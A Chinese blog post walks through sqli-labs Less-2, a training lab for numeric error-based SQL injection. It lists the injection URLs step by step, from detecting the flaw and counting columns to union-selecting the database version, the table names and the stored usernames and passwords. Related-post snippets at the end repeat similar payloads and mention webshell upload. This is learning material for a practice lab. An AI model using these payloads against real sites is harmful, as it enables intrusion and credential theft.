sqli-labs-master第二关:Error Based- Intiger

最新推荐文章于 2024-04-22 20:38:19 发布
最新推荐文章于 2024-04-22 20:38:19 发布
阅读量244 收藏 1
点赞数 2
分类专栏: 笔记 文章标签: 安全 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43606134/article/details/105976709
版权

前言:经过第一关的学习,我相信你已经对sql注入有了简单的了解,如果还没看第一关,请关注我的以前博客,话不多说开始吧。
第二关:
http://192.168.89.131/sqli-labs-master/Less-2/
在这里插入图片描述
还是跟着第一关思路来分析
http://192.168.89.131/sqli-labs-master/Less-2/?id=1%27来测试
在这里插入图片描述
报我们语句有错误,和第一关报错一样。我们猜想有两种可能:1.可能我们的’没有被过滤,导致语法错误。2.可能就是简单的“字符”注入从而导致多出来一个’,导致语法错误。

接下来为了验证我们的猜想我们为一一尝试
先验证是不是字符注入:
http://192.168.89.131/sqli-labs-master/Less-2/?id=1’ and1=1 %23
在这里插入图片描述
还是说我们语法错误,第一种可能被排除,接着验证第二种猜想。
http://192.168.89.131/sqli-labs-master/Less-2/?id=1 and 1 = 1 %23
在这里插入图片描述
看到结果我们笑了,和们的猜想的一样,判断是数字型注入。
到底有没有注入点呢?还需要一步检测
http://192.168.89.131/sqli-labs-master/Less-2/?id=1 and 1 = 2 %23
在这里插入图片描述
是不是感觉很熟悉,没有回显,存在注入点。
接下来的步骤我想你们也能猜想到,猜字段呗
http://192.168.89.131/sqli-labs-master/Less-2/?id=1 order by 1 %23
在这里插入图片描述
我们以此类推知道猜到4时
http://192.168.89.131/sqli-labs-master/Less-2/?id=1 order by 4 %23
在这里插入图片描述
回显错误,说明只有3个字段
接下来用SQL UNION 操作符进行联合查询
http://192.168.89.131/sqli-labs-master/Less-2/?id=-1 union select 1,2,3 %23
在这里插入图片描述
看到2和3
用version()看版本:
用database()看当前网站使用的数据库
http://192.168.89.131/sqli-labs-master/Less-2/?id=-1 union select 1,version(), database() %23
在这里插入图片描述
我们通过上图可以看到数据库是“security”
版本是5.6.48

接下来查看数据库中的表的名称信息:

http://192.168.89.131/sqli-labs-master/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = ‘security’ %23
在这里插入图片描述
接下来就是查看username和password里的内容:
http://192.168.89.131/sqli-labs-master/Less-2/?id=-1 union select 1,username,password from users where id = 2 %23
在这里插入图片描述
我们在看到users表里还看到了id,我们看看有多少组账号密码
只需要在后面加上 where id = n
即可经过测试 id 最大是14
http://192.168.89.131/sqli-labs-master/Less-2/?id=-1 union select 1,username,password from users where id = 14%23
在这里插入图片描述
第二关结束
总结:第一关与第二关的异同,注入类型不一样。整体思路与方法并没有变。
本文章为自己搭建实验环境做过的,参考过一些资料,希望对你有帮助

m__ing
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs系列——第二
1匹黑马
04-26 4043
文章目录判断注入类型开始注入 判断注入类型 1' and '1'='1 //错误 1 and 1=1 //正常 所以是数字型注入,所以不需要单引号来闭合前边的参数,但是要用-把参数注释掉,让Mysql执行我们后边的exp 开始注入 这里就不一一去爆了,跟第一的流程是一样的,直接上exp干了: http://192.168.1.113:86/Less-2/?id=-1 union SELE...
sqli-labs----第二
wyzhxhn的博客
11-05 359
第二
sqli-labs通笔记第二
最新发布
m0_66169375的博客
04-22 456
limit后面的第一个参数表示从第几+1行开始查,第二个参数表示查几条数据。11,利用sql爆出username,password列的值。id=1 and 1=1 回显正常,判断为数字型。9,利用sql爆破出user数据表内的列名。6,爆破出security数据库内的表名。7,如果上一步没有爆出数据库名,也可以。id=1 and 1=2回显错误。eg:3,2 第四行,取两行。2,判断注入类型,字符型,数值型。1,传入id=1 查看页面回显。5,爆破出数据库内的数据库名。4,查数据库名和版本号。
SQLI-labs-第二
weixin_54055099的博客
08-29 344
SQLI第二的思路
sqli-labs第2
weixin_45626840的博客
04-23 210
直接开始 1、判断注入点 2、判断类型------>有下图可知为数字型 3、判断字段数 4、测试回显列,优先联合注入 5、有回显,优先尝试联合注入 6、接下来查库,查表,查字段,固定套路
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
【网安自学/web漏洞-day02】sqli-labs第二(改为跨站注入)
加油~
05-07 281
查询注入点与第一题不一样,其他都一样,所以试一试跨站注入 若一个网页的注入点使用的是root用户,那么可以使用这个注入点跨库查询其他的数据库。 例如:;使用sqil-labs root用户注入进行跨库攻击: 在网站后添加id=1发现显示用户名 判断是否是字符注入 http://127.0.0.1/sqli-labs/Less-2/?id=1’ 根据报错类型判断可能是int类型:http://127.0.0.1/sqli-labs/Less-2/?id=1...
sqli-labs-master靶场第二详解
tangtang_888的博客
07-06 1771
1、点击进入sqli-labs-master靶场第二Less-2 2、输入?id=1' and '1'='1,回显不正常,说明此处为数字型注入 3、依次输入?id=1 order by (1,2,3,4)--+,在输入4时出现报错,说明字段数为3
通过sqli-labs-master第二完成木马上传
快递小哥的博客
01-08 410
写入一句话木马条件 一.写权限 写文件 Into Outfile into Dumpfile 二.需要知道网站绝对路径 如何确定网站绝对路径 @@basedir @@datadir 1.判断注入漏洞,是数值型注入 2.判断显示位之后,...
新手纪录一下sqlilabs第二
weixin_52780973的博客
07-02 871
sqllib第二
SQLI-LABS 02.第二 【显错注入_数字型不闭合】
weixin_45284414的博客
05-15 291
不需要心单引号闭合,只需要最后-- x注释掉后边内容。中间可以构造使用AND OR 拼接语句进行探测。
SQLi-Labs】Less-2 Error based - Intiger based
xw1995115的博客
11-12 1219
第二课:基于报错的数字型注入 1. 本节与less-1的原理基本一样,不同的是参数去掉了引号包裹 2.判断注入点和注入形式 http://10.1.2.210:8000/Less-1/?id=2-1 执行结果如下 2.“2-1”被成功执行为 1,故本题为基于数字型的注入 3.构造查询找到回显数量及位置 ?id=-1 order by 1 --+ ?id=-1 order by 2 --+ ?id=-1 order by 3 --+ ?id=-1 order by 4 --+ .
SQLi-Labs刷题记录】 第二、三、四思路
gavinmao97的博客
07-31 509
/* 作者刚刚接触sql注入,本文仅用作记录刷sqli-labs靶场时的思路,仅代表个人的看法,如有不当之处,欢迎各位大佬及时批评指正! */ sqli-labs 前四的注入思路是基本相同的,这一点从卡名称上也可以大致看出,都是基于报错(Error Based)的注入,因此本文只简单阐述第二、三、四的注入点探测思路,具体的注入过程可以参考上一篇文章【SQLi-Labs刷题记录】 Less1第一思路。 目录sqli-labs Less-2sqli-labs Less-3sqli-labs Less-
sqli-labs练习(第二)——数字型
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
07-17 1738
1、先判断是字符型还是数字型。 172.16.11.222/sqli-labs/Less-2/?id=1 id=2-1 与 id=1的结果一样,说明是数字型。 2、确认字段位数 172.16.11.222/sqli-labs/Less-2/?id=1 order by 3 一共3位 3、确认占位信息 172.16.11.222/sqli-labs/Less-2/?id=-1 union select 1,2,3 --+ 4、找库名 http://172.16.11.222/sqli-labs/Less-
sqli-labs-master第一
05-19
sqli-labs-master是一个SQL注入练习平台,第一是一个基础的SQL注入练习。 首先,打开练习平台,找到第一的链接。在链接的末尾加上 `'`,观察页面的响应。如果页面存在SQL注入漏洞,那么会显示类似如下的错误...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值